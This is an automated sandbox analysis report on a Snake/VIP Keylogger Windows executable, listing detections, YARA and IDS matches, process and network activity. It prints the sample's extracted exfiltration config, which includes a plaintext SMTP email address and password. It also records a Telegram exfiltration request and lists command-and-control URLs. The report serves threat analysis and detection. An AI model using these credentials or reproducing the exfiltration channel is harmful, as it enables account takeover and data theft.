
Windows Analysis Report
CMR_7649.EXE.exe

Overview

General Information

Sample name: CMR_7649.EXE.exe
Analysis ID: 1519293
MD5: b686bc08d9ec68d1746859235ecb70fd
SHA1: bd5a42f4351873517aee319c3abec53569bf1be9
SHA256: 4c19b3b4b58d6dac32e4b968d7e5a9fa6d30146e0680bcef4320a5079f5ed2e9
Tags: exe, HUN, user-smica83

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • CMR_7649.EXE.exe (PID: 6888 cmdline: "C:\Users\user\Desktop\CMR_7649.EXE.exe" MD5: B686BC08D9EC68D1746859235ECB70FD)
    • RegSvcs.exe (PID: 3152 cmdline: "C:\Users\user\Desktop\CMR_7649.EXE.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "denis.petcu@dobrogeagrup.ro", "Password": "dobden2020@", "Host": "m1.wcloud.ro", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings:
  • 0x2d47d:$a1: get_encryptedPassword
  • 0x2d78a:$a2: get_encryptedUsername
  • 0x2d29b:$a3: get_timePasswordChanged
  • 0x2d396:$a4: get_passwordField
  • 0x2d493:$a5: set_encryptedPassword
  • 0x2eb19:$a7: get_logins
  • 0x2ea7c:$a10: KeyLoggerEventArgs
  • 0x2e6e1:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
Source | Rule | Description | Author | Strings
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
1.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
1.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings:
  • 0x2d67d:$a1: get_encryptedPassword
  • 0x2d98a:$a2: get_encryptedUsername
  • 0x2d49b:$a3: get_timePasswordChanged
  • 0x2d596:$a4: get_passwordField
  • 0x2d693:$a5: set_encryptedPassword
  • 0x2ed19:$a7: get_logins
  • 0x2ec7c:$a10: KeyLoggerEventArgs
  • 0x2e8e1:$a11: KeyLoggerEventArgsEventHandler
                  No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T10:23:05.097635+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP
2024-09-26T10:23:11.903614+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 188.114.96.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T10:23:03.721929+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 193.122.130.0 | 80 | TCP
2024-09-26T10:23:04.534428+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 193.122.130.0 | 80 | TCP
2024-09-26T10:23:05.925139+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | TCP
2024-09-26T10:23:07.034408+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 193.122.130.0 | 80 | TCP


                  AV Detection

Source: CMR_7649.EXE.exe | Avira: detected
Source: http://aborters.duckdns.org:8081 | URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081 | URL Reputation: Label: malware
Source: 1.2.RegSvcs.exe.400000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "denis.petcu@dobrogeagrup.ro", "Password": "dobden2020@", "Host": "m1.wcloud.ro", "Port": "587", "Version": "4.4"}
Source: CMR_7649.EXE.exe | ReversingLabs: Detection: 28%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: CMR_7649.EXE.exe | Joe Sandbox ML: detected

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: CMR_7649.EXE.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: CMR_7649.EXE.exe, 00000000.00000003.1689749909.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CMR_7649.EXE.exe, 00000000.00000003.1689561661.00000000045D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: CMR_7649.EXE.exe, 00000000.00000003.1689749909.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CMR_7649.EXE.exe, 00000000.00000003.1689561661.00000000045D0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0139F8E9h | 1_2_0139F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0139FD41h | 1_2_0139FA88

                  Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View | ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.96.3:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 26 Sep 2024 08:23:13 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003153000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003144000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000314E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000304F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000300A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000304F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.000000000300A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: RegSvcs.exe, 00000001.00000002.4111428677.0000000004212000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004335000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.000000000406E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: RegSvcs.exe, 00000001.00000002.4111428677.0000000004310000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000041ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegSvcs.exe, 00000001.00000002.4111428677.0000000004212000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004335000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.000000000406E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: RegSvcs.exe, 00000001.00000002.4111428677.0000000004310000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000041ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003184000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003175000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000317F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

System Summary

Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
